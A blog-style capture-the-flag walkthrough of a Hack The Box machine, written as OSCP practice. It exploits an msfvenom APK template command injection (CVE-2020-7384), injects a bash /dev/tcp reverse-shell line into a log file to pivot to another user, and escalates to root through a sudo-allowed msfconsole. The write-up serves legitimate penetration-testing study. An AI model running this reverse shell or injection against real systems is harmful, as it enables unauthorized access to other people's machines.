I am in the midst of my pursuit for the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on Hack The Box (HTB) platform. HTB is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.

Yet another box!

Reconnaissance

My first step would be to run a Nmap scan:

nmap -Pn -sC -sV -oN initial 10.10.10.226

These were the results:

Scanning and Enumeration

Seeing port 5000 was open, I visited it and was greeted with this page:

There were 3 tools on the page: Nmap, MsfVenom and Searchsploit. They all worked as per usual. Realising I was getting nowhere, I started Googling about vulnerabilities these tools may have and stumbled upon CVE-2020-7384: MsfVenom APK template command injection.

Exploitation

I quickly fired up MsfConsole and used exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection the following options:

I fired up a Netcat listener to catch any incoming shells: nc -nlvp 4444. Then, I uploaded the malicious template that I just generated to the website with the following options:

Gaining Access

Upon hitting generate, I was greeted with a shell on Netcat. I then upgraded my shell using Python and grabbed the user flag:

Then, I generated a pair of SSH keys and placed the public key on the remote machine. This was to stabilise my connection and access the machine with SSH:

Scanning and Enumeration [2]

After enumerating the machine, I found another user pwnand a script in the user’s home directory. Analysing the script, I realised that Nmap was running against a file called hackers.

Exploitation & Gaining Access [2]

I fired up another Netcat listener to catch any incoming shells and used a bash script to run a reverse shell to access the pwn user account:

echo "HRI ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1' #" >> hackers

And it worked!

Next, I checked the permissions this user had and realised that it could run MsfConsole as root without a password.

Thus, I ran sudo msfconsole, used the command /bin/bash to open a shell and found the root hash!

It was a fun box! On to the next one 😃